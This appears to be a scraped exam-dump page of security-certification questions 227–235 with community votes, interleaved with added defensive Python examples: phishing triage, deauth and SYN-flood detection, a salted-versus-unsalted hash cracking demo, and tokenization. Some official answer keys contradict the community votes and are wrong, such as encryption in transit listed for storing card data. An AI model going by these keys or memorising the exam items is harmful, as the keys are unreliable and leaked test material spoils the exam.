https://securityboulevard.com/2021/02/your-first-soar-use-case-phishing-triage/
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: SOAR playbook

SOAR playbooks are used to automate key functions of a SOC based on processes documented in the incident response playbooks.
upvoted 1 times
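A SOAR playbook for phishing is a fixed sequence of enrichment and response steps run on every reported message: extract the sender and URLs, add them to blocklists, then search every mailbox for the same Message-ID and pull the copies nobody has reported yet. The following added example (not from the page) is a minimal in-memory version of that playbook. The reported e-mail, the mailbox contents and the domain names are constructed; the mailbox dictionary stands in for a mail-server search API.

```python
import re
from email import message_from_string
from email.utils import parseaddr

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def extract_iocs(raw_message):
    """Pull the indicators the playbook acts on out of a reported e-mail."""
    msg = message_from_string(raw_message)
    _, sender = parseaddr(msg.get("From", ""))
    body = msg.get_payload() if not msg.is_multipart() else ""
    return {
        "sender": sender.lower(),
        "sender_domain": sender.rsplit("@", 1)[-1].lower() if "@" in sender else "",
        "message_id": msg.get("Message-ID", "").strip(),
        "subject": msg.get("Subject", ""),
        "urls": sorted(set(URL_RE.findall(body))),
    }


def run_phishing_playbook(raw_message, mailboxes, sender_blocklist, url_blocklist):
    """One playbook run: updates the blocklists in place and returns the actions taken.

    mailboxes: {user: [Message-IDs]} - constructed stand-in for a mailbox search.
    """
    iocs = extract_iocs(raw_message)
    actions = []
    if iocs["sender"] and iocs["sender"] not in sender_blocklist:
        sender_blocklist.add(iocs["sender"])
        actions.append(("block_sender", iocs["sender"]))
    for url in iocs["urls"]:
        if url not in url_blocklist:
            url_blocklist.add(url)
            actions.append(("block_url", url))
    # Every other mailbox that received the same message gets it pulled.
    for user, ids in mailboxes.items():
        if iocs["message_id"] in ids:
            ids.remove(iocs["message_id"])
            actions.append(("quarantine", user))
    return actions


# Constructed reported message (not from the page); note the look-alike domain.
REPORTED_EMAIL = """\
From: "IT Helpdesk" <helpdesk@examp1e-support.test>
To: alice@example.test
Subject: Your password expires today
Message-ID: <20230120.1@examp1e-support.test>

Your password expires in 2 hours. Reset it now: http://examp1e-support.test/reset
"""

# Constructed mailbox state: two recipients got the phish, one did not.
MAILBOXES = {
    "alice": ["<20230120.1@examp1e-support.test>", "<other@example.test>"],
    "bob": ["<20230120.1@examp1e-support.test>"],
    "carol": ["<newsletter@example.test>"],
}
```

The second run of the playbook on the same report returns no actions, which is the idempotency you want when several users report the same campaign within minutes of each other.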


Question #227 Topic 1

A user reports constant lag and performance issues with the wireless network when working at a local coffee shop. A security analyst walks the
user through an installation of Wireshark and gets a five-minute pcap to analyze. The analyst observes the following output:

Which of the following attacks does the analyst MOST likely see in this packet capture?

A. Session replay

B. Evil twin

C. Bluejacking

D. ARP poisoning

Correct Answer: A

Community vote distribution


B (75%) A (25%)

  [Removed] Highly Voted  3 months, 3 weeks ago


Selected Answer: B
coffee shop = public wifi,

a deauthentication attack to the target client, disconnecting it from its current network, thus allowing the client to automatically connect to the
evil twin access point.
upvoted 9 times

  JSOG Most Recent  2 months ago


Selected Answer: B
Deauthentication
Description
This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Disassociating clients
can be done for a number of reasons:

Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.
Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
Of course, this attack is totally useless if there are no associated wireless client or on fake authentications.
upvoted 1 times

  ankit_1606 3 months ago


Selected Answer: B
https://surfshark.com/blog/what-is-evil-twin-attack
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
I don't think it's Evil Twin because it doesn't state anything about "two wifi SSIDs with the same name". It just says they are at a coffee shop.

What it does state however is that there is lag and etc...which a Session Replay does.

Session replay attacks, also known as replay or replay attacks, are network attacks that maliciously “retry” or “delay” valid data transmissions.
Hackers can do this by intercepting the session and stealing the user’s unique session ID (stored as either a cookie, URL, or form field). The
hacker can now impersonate the authorized user and have full access to do everything the authorized user can do on the website.

A replay attack occurs when a cybercriminal intercepts a secure network communication, intercepts it, and fraudulently delays or transmits it to
trick the recipient into doing what the attacker is looking for.
upvoted 4 times

  Sandon 1 week, 2 days ago


You missed the keyword "deauthentication"


upvoted 1 times

  yasuke 2 months, 3 weeks ago


IEEE 802.11 refers to the set of standards that define communication for wireless LANs (wireless local area networks, or WLANs). The
technology behind 802.11 is branded to consumers as Wi-Fi.
upvoted 1 times

  comeragh 3 months, 3 weeks ago


Selected Answer: B
Agreed with B - Evil Twin here.
upvoted 3 times

  Kashim 3 months, 3 weeks ago


Selected Answer: A
Only session replay makes sense to me. Evil twin is a copy of a legitimate SSID (access point). No deauthentication is needed here.
upvoted 2 times

  Skelter117 3 months, 3 weeks ago


I’m almost positive you have to deauth to get them to connect to the evil twin. I do not believe session replay has a deauth needed.
Thoughts?
upvoted 3 times

  Sandon 1 week, 2 days ago


You're exactly right, it's an evil twin
upvoted 1 times

  ksave 3 months, 3 weeks ago


Selected Answer: B
Deauthentication: Seems Evil Twin to me
upvoted 4 times
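The packet capture for this question is not reproduced on the page, but the two signals the commenters point to are easy to check for programmatically: a burst of deauthentication frames aimed at one client, and the same SSID being beaconed by more than one BSSID. The following added example (not from the page) runs both checks over a constructed one-line-per-frame capture summary in which the attacker spoofs the real AP's address to deauthenticate the client, which then associates to the second BSSID. The line format, addresses and thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed capture summary (assumption): "<seconds> <tx> -> <rx> <subtype> [SSID=...]"
SAMPLE_FRAMES = """\
0.000 aa:bb:cc:dd:ee:01 -> ff:ff:ff:ff:ff:ff Beacon SSID=CoffeeShop_Free
0.102 aa:bb:cc:dd:ee:01 -> ff:ff:ff:ff:ff:ff Beacon SSID=CoffeeShop_Free
0.210 de:ad:be:ef:00:01 -> ff:ff:ff:ff:ff:ff Beacon SSID=CoffeeShop_Free
0.300 aa:bb:cc:dd:ee:01 -> 11:22:33:44:55:66 Deauthentication
0.301 aa:bb:cc:dd:ee:01 -> 11:22:33:44:55:66 Deauthentication
0.302 aa:bb:cc:dd:ee:01 -> 11:22:33:44:55:66 Deauthentication
0.303 aa:bb:cc:dd:ee:01 -> 11:22:33:44:55:66 Deauthentication
0.304 aa:bb:cc:dd:ee:01 -> 11:22:33:44:55:66 Deauthentication
0.305 aa:bb:cc:dd:ee:01 -> 11:22:33:44:55:66 Deauthentication
0.900 11:22:33:44:55:66 -> de:ad:be:ef:00:01 Association Request SSID=CoffeeShop_Free
"""

FRAME_RE = re.compile(r"^(\d+\.\d+) (\S+) -> (\S+) ([A-Za-z ]+?)(?: SSID=(\S+))?$")
DEAUTH_THRESHOLD = 5     # deauths to one client inside the window
WINDOW_SECONDS = 1.0


def parse_frames(text):
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.match(line)
        if m:
            ts, src, dst, subtype, ssid = m.groups()
            frames.append((float(ts), src, dst, subtype, ssid))
    return frames


def find_deauth_floods(frames):
    """Flag (transmitter, target) pairs with >= DEAUTH_THRESHOLD deauths in any window."""
    stamps_by_pair = defaultdict(list)
    for ts, src, dst, subtype, _ in frames:
        if subtype == "Deauthentication":
            stamps_by_pair[(src, dst)].append(ts)
    floods = {}
    for pair, stamps in stamps_by_pair.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):          # sliding window over sorted times
            while stamps[end] - stamps[start] > WINDOW_SECONDS:
                start += 1
            if end - start + 1 >= DEAUTH_THRESHOLD:
                floods[pair] = len(stamps)
                break
    return floods


def find_duplicate_ssids(frames):
    """An SSID beaconed by more than one BSSID is an evil-twin candidate."""
    bssids = defaultdict(set)
    for _, src, _, subtype, ssid in frames:
        if subtype == "Beacon" and ssid:
            bssids[ssid].add(src)
    return {ssid: sorted(b) for ssid, b in bssids.items() if len(b) > 1}


def analyze(text):
    frames = parse_frames(text)
    return {"deauth_floods": find_deauth_floods(frames),
            "duplicate_ssids": find_duplicate_ssids(frames)}
```

A duplicate SSID on its own is normal in any multi-AP network, so the two signals should be read together: a deauth burst immediately followed by the victim associating to the other BSSID is what distinguishes the evil twin from a legitimate roam.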


Question #228 Topic 1

A security analyst is reviewing the following output from a system:

Which of the following is MOST likely being observed?

A. ARP poisoning

B. Man in the middle

C. Denial of service

D. DNS poisoning

Correct Answer: C

Community vote distribution


C (100%)

  jspecht 3 months, 1 week ago


Selected Answer: C
Once you realize the destination IP and port are on the left the answer is easier to understand. Multiple source ports trying to connect to the
same destination IP and port means DOS.
upvoted 4 times

  Inimitable 4 weeks, 1 day ago


I agree with answer C, but the source IPs are on the left and the destinations are on the right.

It's a SYN flood attack, also known as a half-open attack. The ports of the server are in TIME_WAIT status because someone has started a
three-way handshake on each port and the ports are now waiting for an acknowledgement. Unfortunately, the ports will never get this
acknowledgement, because the attacker wants these ports to be kept in waiting status so they are not able to respond to any other task.
upvoted 1 times

  Skelter117 3 months, 3 weeks ago


Selected Answer: C
DoS. One source, one destination, sending to each port.
upvoted 3 times

  serginljr 3 months, 3 weeks ago


Selected Answer: C
C correct
upvoted 2 times
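The system output the question refers to is not reproduced on the page; the comments describe a single remote host holding many connections to one local service in a half-open state, which is what a SYN flood looks like in a connection table. The following added example (not from the page) parses constructed netstat-style output and counts half-open connections per (remote host, local service), reporting pairs that exceed a threshold along with how many distinct source ports were used. The output lines, addresses and threshold are assumptions; on Linux the half-open state is shown as SYN_RECV, on Windows as SYN_RECEIVED.

```python
from collections import Counter, defaultdict

# Constructed netstat output (assumption): one remote host opening many
# half-open connections to 443 from different source ports, plus normal traffic.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 10.0.0.5:443            203.0.113.7:51001       SYN_RECV
tcp        0      0 10.0.0.5:443            203.0.113.7:51002       SYN_RECV
tcp        0      0 10.0.0.5:443            203.0.113.7:51003       SYN_RECV
tcp        0      0 10.0.0.5:443            203.0.113.7:51004       SYN_RECV
tcp        0      0 10.0.0.5:443            203.0.113.7:51005       SYN_RECV
tcp        0      0 10.0.0.5:443            203.0.113.7:51006       SYN_RECV
tcp        0      0 10.0.0.5:443            198.51.100.2:40001      ESTABLISHED
tcp        0      0 10.0.0.5:22             192.168.1.10:55012      ESTABLISHED
tcp        0      0 10.0.0.5:443            203.0.113.9:40201       TIME_WAIT
"""

HALF_OPEN_STATES = {"SYN_RECV", "SYN_RECEIVED"}   # Linux / Windows spelling
THRESHOLD = 5


def split_endpoint(endpoint):
    """'10.0.0.5:443' -> ('10.0.0.5', 443); works for bracketed IPv6 too."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def parse_netstat(text):
    """Keep TCP rows; the last three columns are local, foreign and state on
    both the Linux (6-column) and Windows (4-column) layouts."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0].lower().startswith("tcp"):
            local, foreign, state = parts[-3], parts[-2], parts[-1]
            rows.append((split_endpoint(local), split_endpoint(foreign), state))
    return rows


def find_syn_floods(rows):
    """Count half-open connections per (remote host, local service); flag the busiest."""
    half_open = Counter()
    source_ports = defaultdict(set)
    for (lhost, lport), (fhost, fport), state in rows:
        if state in HALF_OPEN_STATES:
            key = (fhost, "%s:%d" % (lhost, lport))
            half_open[key] += 1
            source_ports[key].add(fport)
    return {key: {"half_open": count, "distinct_source_ports": len(source_ports[key])}
            for key, count in half_open.items() if count >= THRESHOLD}
```

Many distinct source ports from one address with nothing ever reaching ESTABLISHED is the signature to look for; a busy but legitimate client shows a handful of half-open entries that quickly turn into established sessions.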


Question #229 Topic 1

Which of the following concepts BEST describes tracking and documenting changes to software and managing access to files and systems?

A. Version control

B. Continuous monitoring

C. Stored procedures

D. Automation

Correct Answer: A

Community vote distribution


A (100%)

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: A
Version control, also known as source control, is the process of tracking and managing changes to files over time
upvoted 5 times

  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: A
Git is your friend
upvoted 1 times

  Kashim 3 months, 3 weeks ago


Selected Answer: A
A correct
upvoted 4 times


Question #230 Topic 1

A penetration tester is brought on site to conduct a full attack simulation at a hospital. The penetration tester notices a WAP that is hanging from
the drop ceiling by its cabling and is reachable. Which of the following recommendations would the penetration tester MOST likely make given this
observation?

A. Employ a general contractor to replace the drop-ceiling tiles.

B. Place the network cabling inside a secure conduit.

C. Secure the access point and cabling inside the drop ceiling.

D. Utilize only access points that have internal antennas

Correct Answer: C

Community vote distribution


C (100%)

  carpathia 2 months, 3 weeks ago


I thought APs are not meant to have physical objects "in front" of them because of signal reduction. Sitting behind tiles would not be a good idea.
But then the other options are not very convincing either.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
Don't over think this one. It's honestly just to make sure the access point is back in place and not readily reachable.
upvoted 3 times

  Kashim 3 months, 3 weeks ago


Selected Answer: C
I think C is the best option here.
upvoted 3 times


Question #231 Topic 1

Which of the following techniques eliminates the use of rainbow tables for password cracking?

A. Hashing

B. Tokenization

C. Asymmetric encryption

D. Salting

Correct Answer: D

Community vote distribution


D (100%)

  theglass Highly Voted  3 months, 4 weeks ago


Selected Answer: D
Per prof. Messer's notes: "Rainbow tables won’t work with salted hashes"
upvoted 8 times

  FMMIR Most Recent  2 months, 1 week ago


Selected Answer: D
Defense against rainbow table attacks: rainbow table attacks can easily be prevented by using salt techniques, which add random data that is
passed into the hash function along with the plain text. This ensures that every password has a unique generated hash and hence the rainbow table
attack, which works on the principle that more than one text can have the same hash value, is prevented.
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


D = using salt techniques. you can find it on the internet.
upvoted 1 times

  chipdomcobb 3 months, 4 weeks ago


Selected Answer: D
I don't know if it eliminates the problem, but I'm going with salting.
upvoted 3 times
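The reason salting defeats a rainbow table is that the table is a one-off precomputation over the password space, and a per-user random salt means the value being looked up was never in that space. The following added example (not from the page) makes that concrete: it precomputes a lookup table over a small constructed wordlist (standing in for a rainbow table), reverses an unsalted SHA-256 hash with a single lookup, then shows the same lookup fail against a salted PBKDF2 digest and two users with the same password getting different digests. The wordlist and iteration count are assumptions.

```python
import hashlib
import hmac
import os

# Constructed wordlist (assumption): the password space the attacker precomputes.
WORDLIST = ["password", "letmein", "Winter2023", "qwerty", "hunter2"]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def precompute_unsalted(words):
    """The attacker's offline step: hash -> plaintext for every candidate, done once,
    reusable against every unsalted database the attacker ever obtains."""
    return {sha256_hex(word.encode()): word for word in words}


def crack(digest_hex, table):
    """Reversing an unsalted hash is a single dictionary lookup."""
    return table.get(digest_hex)


def salted_hash(password, salt):
    """Random per-user salt mixed into a slow KDF (PBKDF2-HMAC-SHA256 here)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


def store_password(password):
    salt = os.urandom(16)          # fresh salt per password; stored next to the digest
    return salt, salted_hash(password, salt)


def verify_password(password, salt, stored_digest):
    return hmac.compare_digest(salted_hash(password, salt), stored_digest)


def demo():
    table = precompute_unsalted(WORDLIST)
    unsalted = sha256_hex(b"letmein")
    salt_a, digest_a = store_password("letmein")
    salt_b, digest_b = store_password("letmein")
    return {
        "unsalted_cracked": crack(unsalted, table),        # 'letmein' in one lookup
        "salted_cracked": crack(digest_a.hex(), table),    # None: not in the table
        "same_password_same_hash": digest_a == digest_b,   # False: different salts
        "verify_ok": verify_password("letmein", salt_a, digest_a),
        "verify_wrong": verify_password("password", salt_a, digest_a),
    }
```

The caveat a practitioner should keep in mind: salting removes the shared precomputation, but an attacker who has the salt can still guess each digest individually, which is why the salt is paired with a deliberately slow function (PBKDF2, bcrypt, scrypt or Argon2) rather than a plain hash.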


Question #232 Topic 1

During a security assessment, a security analyst finds a file with overly permissive permissions. Which of the following tools will allow the analyst
to reduce the permissions for the existing users and groups and remove the set-user-ID bit from the file?

A. ls

B. chflags

C. chmod

D. lsof

E. setuid

Correct Answer: C

Community vote distribution: C (100%)

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: C
chmod removes the setuid permission, that is, it removes the s bit. setuid is the specific permission, but it is removed with chmod.
https://www.cbtnuggets.com/blog/technology/system-admin/linux-file-permissions-understanding-setuid-setgid-and-the-sticky-bit
upvoted 6 times

  passmemo 3 months, 3 weeks ago


The chmod (short for change mode) command is used to manage file system access permissions on Unix and Unix-like systems.
upvoted 3 times

  Knowledge33 Most Recent  3 months ago


Selected Answer: C
Chmod is the Linux command used to change access permissions of a file. The general form of the command is
chmod <options> <permissions> <filename>
upvoted 1 times

  chipdomcobb 3 months, 4 weeks ago


The setuid part threw me, but from what I read at the link below, it appears this action can be done with chmod, so I'm going with C.

https://serverfault.com/questions/238962/how-do-i-clear-the-s-permission-on-a-directory-in-linux
upvoted 4 times
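As an added example (not from the original page), the same fix done programmatically: audit a file's mode bits, then apply the equivalent of `chmod 0750 file`, which drops the setuid bit and tightens group/other permissions in one step. The temp file and its starting mode 4777 are constructed for the demo.

```python
import os
import stat
import tempfile

SPECIAL_BITS = stat.S_ISUID | stat.S_ISGID | stat.S_ISVTX


def audit_file_mode(path: str) -> dict:
    """Report the bits an assessor cares about, as `ls -l` or `stat` would show them."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return {
        "octal": oct(mode),
        "setuid": bool(mode & stat.S_ISUID),
        "setgid": bool(mode & stat.S_ISGID),
        "world_readable": bool(mode & stat.S_IROTH),
        "world_writable": bool(mode & stat.S_IWOTH),
    }


def strip_special(mode: int) -> int:
    """Return mode with setuid, setgid and sticky bits cleared (pure function)."""
    return mode & ~SPECIAL_BITS


def harden_file_mode(path: str, new_perms: int = 0o750) -> int:
    """Clear the special bits and set the rwx bits to new_perms.

    Same effect as `chmod u-s,g-s file` followed by `chmod 750 file`
    (or simply `chmod 0750 file`). Returns the resulting mode bits."""
    os.chmod(path, strip_special(new_perms))   # never carry a special bit through
    return stat.S_IMODE(os.stat(path).st_mode)


def demo() -> tuple:
    """Constructed case: a temp file deliberately left at mode 4777 (setuid + rwx for all)."""
    fd, path = tempfile.mkstemp(prefix="overly-permissive-")
    os.close(fd)
    try:
        os.chmod(path, 0o4777)
        before = audit_file_mode(path)
        after_mode = harden_file_mode(path)
        after = audit_file_mode(path)
    finally:
        os.unlink(path)
    return before, after_mode, after


if __name__ == "__main__":
    before, after_mode, after = demo()
    print("before:", before)
    print("after :", oct(after_mode), after)
```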


Question #233 Topic 1

A network administrator is concerned about users being exposed to malicious content when accessing company cloud applications. The
administrator wants to be able to block access to sites based on the AUP. The users must also be protected because many of them work from
home or at remote locations, providing on-site customer support. Which of the following should the administrator employ to meet these criteria?

A. Implement NAC.

B. Implement an SWG.

C. Implement a URL filter.

D. Implement an MDM.

Correct Answer: B

Community vote distribution: B (90%) 5%

  Kashim Highly Voted  3 months, 3 weeks ago


Selected Answer: B
"A secure web gateway (SWG) protects users from web-based threats in addition to applying and enforcing corporate acceptable use policies."
upvoted 9 times

  comeragh Highly Voted  3 months, 3 weeks ago


Selected Answer: B
Agree with B here. Don't agree with NAC.
upvoted 5 times

  ronniehaang Most Recent  4 days ago


Selected Answer: B
The best solution for the network administrator to implement to meet the criteria of blocking access to sites based on the AUP and protecting
users from malicious content is an SWG (Secure Web Gateway). An SWG provides a centralized solution for monitoring and controlling internet
usage on the network. It inspects all web traffic, scans for malicious content and implements policies to block access to websites that violate the
organization's AUP (Acceptable Use Policy). Additionally, an SWG can provide protection to users when they are accessing cloud applications
from remote locations.
upvoted 1 times

  FMMIR 2 months, 1 week ago


Selected Answer: D
An SWG plays a crucial role in traffic inspection as it analyzes all the web traffic passing through to and from the organization. It blocks content
that does not conform to corporate policies, such as denying entry to unencrypted content from any site. These inspection policies can also be
customized for better organizational implementation.
upvoted 1 times

  FMMIR 2 months, 1 week ago


ANS: B
upvoted 2 times

  carpathia 2 months, 3 weeks ago


Selected Answer: B
https://internet2-0.com/the-difference-between-a-secure-web-gateway-and-a-firewall/

Firewalls inspect data packets
Secure web gateways inspect applications
Secure web gateways set and enforce rules for users
Software as a Service (SaaS) applications
Remote networking
Cloud-based computing
upvoted 3 times

  NXPERT 3 months, 2 weeks ago


Answer is B, NAC is something else, it is associated with 802.1x, which is basically local MFA.
upvoted 2 times

  andrizo 3 months, 3 weeks ago


Not url, because apps
upvoted 2 times


  passmemo 3 months, 3 weeks ago


Selected Answer: A
NAC= Network Access Control
upvoted 1 times

Question #234 Topic 1

A website developer is working on a new e-commerce website and has asked an information security expert for the most appropriate way to store
credit card numbers to create an easy reordering process. Which of the following methods would BEST accomplish this goal?

A. Salting the magnetic strip information

B. Encrypting the credit card information in transit

C. Hashing the credit card numbers upon entry

D. Tokenizing the credit cards in the database

Correct Answer: B

Community vote distribution: D (100%)

  nyeah Highly Voted  3 months, 4 weeks ago


Selected Answer: D
Shouldn't the answer be D?
upvoted 7 times

  pdbone Highly Voted  3 months, 4 weeks ago


Credit card tokenization is the process of de-identifying sensitive cardholder data by converting it to a string of randomly generated numbers
called a "token." Similar to encryption, tokenization obfuscates the original data to render it unreadable in the event of a data breach or other
exposure.
upvoted 5 times

  Gino_Slim Most Recent  3 months, 1 week ago


Selected Answer: D
To help those who may need to see it in another way

A: It's "e-commerce" so the stripe of the card has no relevance here
B: In transit doesn't work because we are looking at stored information
C: Hashing will always SOUND good but that isn't applicable either. So this won't be it either.
upvoted 4 times

  J_Ark1 2 months, 3 weeks ago


why not c plz explain
upvoted 1 times

  Sandon 1 week, 2 days ago


Hashing is one-way
upvoted 1 times

  JStevie 2 months, 2 weeks ago


they ask for easy reordering = tokenization
upvoted 2 times

  usertest456 3 months, 3 weeks ago


Selected Answer: D
answer should be D
upvoted 3 times

  Kashim 3 months, 4 weeks ago


Selected Answer: D
https://youtu.be/bCknf8goMH0?t=90
D. Tokenization
upvoted 3 times
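An added example (not from the original page) of the tokenization design the thread describes: the merchant's database keeps only a random token and the last four digits, the vault inside the payment environment keeps the mapping, and a reorder is just the token going back to the vault. The TokenVault and MerchantDB classes are illustrative, and the card number is the well-known Luhn-valid test value 4111 1111 1111 1111.

```python
import secrets
from typing import Dict, Optional


def luhn_valid(pan: str) -> bool:
    """Luhn check on the digits of a card number (a format sanity check only)."""
    digits = [int(c) for c in pan if c.isdigit()]
    if len(digits) < 12:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:              # every second digit from the right is doubled
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


class TokenVault:
    """Stand-in for the vault inside the PCI-scoped payment environment.

    It is the only component that ever holds a PAN; everything else sees tokens."""

    def __init__(self) -> None:
        self._pan_by_token: Dict[str, str] = {}
        self._token_by_pan: Dict[str, str] = {}

    def tokenize(self, pan: str) -> str:
        pan = "".join(c for c in pan if c.isdigit())
        if not luhn_valid(pan):
            raise ValueError("not a well-formed card number")
        # Design choice: same card -> same token, so a returning customer's card
        # can be matched by the merchant without the merchant seeing the PAN.
        if pan not in self._token_by_pan:
            token = "tok_" + secrets.token_hex(12)   # random, unrelated to the PAN
            self._pan_by_token[token] = pan
            self._token_by_pan[pan] = token
        return self._token_by_pan[pan]

    def detokenize(self, token: str) -> Optional[str]:
        """Reverse mapping, available only inside the payment environment."""
        return self._pan_by_token.get(token)


class MerchantDB:
    """The e-commerce site's own customer store: tokens and last four digits only."""

    def __init__(self, vault: TokenVault) -> None:
        self.vault = vault
        self.customers: Dict[str, dict] = {}

    def save_card(self, customer_id: str, pan: str) -> str:
        token = self.vault.tokenize(pan)
        digits = "".join(c for c in pan if c.isdigit())
        self.customers[customer_id] = {"token": token, "last4": digits[-4:]}
        return token

    def reorder(self, customer_id: str) -> bool:
        """One-click reorder: hand the stored token back to the payment environment.

        The merchant never reconstructs the PAN. A hash of the PAN could not be
        reversed like this at all, which is why hashing does not support reordering."""
        token = self.customers[customer_id]["token"]
        return self.vault.detokenize(token) is not None


def demo() -> dict:
    vault = TokenVault()
    shop = MerchantDB(vault)
    test_pan = "4111 1111 1111 1111"   # constructed input: standard test card number
    tok_alice = shop.save_card("alice", test_pan)
    tok_bob = shop.save_card("bob", test_pan)
    try:
        vault.tokenize("4111 1111 1111 1112")   # fails the Luhn check
        rejected = False
    except ValueError:
        rejected = True
    return {
        "token_reveals_pan": "4111111111111111" in tok_alice,               # False
        "same_card_same_token": tok_alice == tok_bob,                       # True
        "merchant_db_holds_pan": "4111111111111111" in str(shop.customers), # False
        "reorder_ok": shop.reorder("alice"),                                # True
        "invalid_pan_rejected": rejected,                                   # True
    }
```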


Question #235 Topic 1

Which of the following supplies non-repudiation during a forensics investigation?

A. Dumping volatile memory contents first

B. Duplicating a drive with dd

C. Using a SHA-2 signature of a drive image

D. Logging everyone in contact with evidence

E. Encrypting sensitive data

Correct Answer: C

Community vote distribution: C (62%) D (38%)

  atrax Highly Voted  3 months, 2 weeks ago


Selected Answer: C
Yeah, it’s C. Nonrepudiation is specifically talking about the proof that someone has done something on the system. Taking a hash of the original
disk is proof that it represents the state of the data when the investigation began. It’s not a signature in the sense of an encryption cert or
something like that, but it is definitely a method of ensuring that the data on the drive represents the user’s changes, vice those of the
investigator or someone else after the fact. Chain of custody doesn’t apply because nonrepudiation is talking about the data itself.
upvoted 9 times

  RawToast Highly Voted  3 months ago


Selected Answer: D
I would go with D. logging everyone in contact. While a hash function like C. would grant integrity, it only partially grants non-repudiation. The
goal of non-repudiation measures is to ensure that no one can alter a claim previously made (example: digital signature proving someone sent
data. They cannot deny that they sent the data because their digital signature was on the transmission.) In this case, answer D. grants non-
repudiation because the logs of everyone in contact are proof of that interaction and cannot be refuted after the fact. C would only prove data
was not altered.
upvoted 7 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 2 times

  hanmai Most Recent  3 days, 20 hours ago


Nonrepudiation provides proof of the origin, authenticity and integrity of data. It provides assurance to the sender that its message was delivered,
as well as proof of the sender's identity to the recipient.
upvoted 1 times

  ronniehaang 6 days, 2 hours ago


Selected Answer: D
Chain of Custody supports non-repudiation.
SHA-2 only supports data integrity
upvoted 2 times

  nicekoda 1 month, 1 week ago


The answer is C. A common method to secure data and maintain authenticity is hashing. This can be used to maintain the authenticity of an
evidence in a forensic investigation
upvoted 1 times

  Jimbobilly 1 month, 4 weeks ago


Selected Answer: C
It is C. A Hash will confirm the data was not altered. Simple as that.
upvoted 4 times

  Nome02 2 months ago


C is correct. Practically D is not even possible all the times.
upvoted 3 times

  itsmorphintime 2 months, 1 week ago


Selected Answer: C
Think about the end goal, we need to make sure the owner of the drive was the only one who was making changes to data. After the drive is in
our hands it doesnt matter anymore, we can prove that nobody else has made changes while the drive is in our hands.
upvoted 3 times


  okay123 2 months, 2 weeks ago


Selected Answer: C
Digital signatures provide authenticity protection, integrity protection, and non-repudiation, but not confidentiality protection. The result of a
cryptographic transformation of data that, when properly implemented, provides origin authentication, assurance of data integrity and signatory
non-repudiation.

- https://csrc.nist.gov/glossary/term/digital_signature#:~:text=Digital%20signatures%20provide%20authenticity%20protection,repudiation%2C%20but%20not%20confidentiality%20protection.&text=800%2D63%2D3-,The%20result%20of%20a%20cryptographic%20transformation%20of%20data%20that%2C%20when,integrity%20and%20signatory%20non%2Drepudiation.

Thus, I am going with C
upvoted 3 times

  carpathia 2 months, 3 weeks ago


Probably the SHA signature thingy. Has anyone ever heard of a SHA SIGNATURE? I haven't. I thought it was a digest. Very confusing to use this
combo especially in this sort of exam environment. A signature provides non-repudiation. SHA doesn't. He he.
upvoted 1 times

  ksave 2 months, 4 weeks ago


Selected Answer: C
Non-repudiation involves hashing. So, going with C
upvoted 3 times

  ahmedhablas 3 months ago


Selected Answer: D
Non-repudiation doesn't equal to integrity
Non-repudiation is about having evidence that the subject actually did an action and that is achieved by keeping logs
upvoted 4 times

  Sandon 1 week, 2 days ago


Not even close
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
Non-repudiation is achieved through cryptography, like digital signatures, and includes other services for authentication, auditing and logging.
Which is what the question is asking for with that. If they stated change of command of chain of custody then it would be D
upvoted 4 times

  jacobtwotwo 3 months, 3 weeks ago


Can someone explain why it's D?
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


I can't. Because it's asking for non-repudiation which is achieved through cryptography, like digital signatures, and includes other services for
authentication, auditing and logging
upvoted 1 times

  Skelter117 3 months, 3 weeks ago


only ones that make sense to me are c and d
upvoted 2 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: D
I'm going with D.
upvoted 3 times

  Dachosenone 3 months, 3 weeks ago


It cannot be SHA-2, hashing can only do integrity.
upvoted 2 times

  [Removed] 3 months, 3 weeks ago


Integrity is what the question is asking for. Non-repudiation
upvoted 9 times
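The thread keeps circling one distinction: a hash of the image proves the data has not changed since acquisition, while the custody record ties that digest to a person and a time. Here is an added example (not from the original page) of the imaging-time workflow behind answer C: a streaming SHA-256 equivalent to `sha256sum` on a dd image, a custody entry that records it, and a check that catches a single flipped bit in the working copy. The sample image, the examiner name and the custody fields are constructed placeholders.

```python
import hashlib
import hmac
import io
import time
from typing import BinaryIO

CHUNK_SIZE = 1024 * 1024   # hash 1 MiB at a time so a multi-GB dd image never sits in RAM


def sha256_of_stream(stream: BinaryIO) -> str:
    """Streaming SHA-256, equivalent to `sha256sum disk.img` on the written image."""
    h = hashlib.sha256()
    for chunk in iter(lambda: stream.read(CHUNK_SIZE), b""):
        h.update(chunk)
    return h.hexdigest()


def record_acquisition(image: bytes, examiner: str, note: str) -> dict:
    """Custody entry taken at imaging time: who acquired what, when, and its digest.

    The digest alone proves content; the examiner and time fields are what the
    chain-of-custody log contributes on top of the hash."""
    return {
        "examiner": examiner,
        "timestamp": int(time.time()),
        "sha256": sha256_of_stream(io.BytesIO(image)),
        "note": note,
    }


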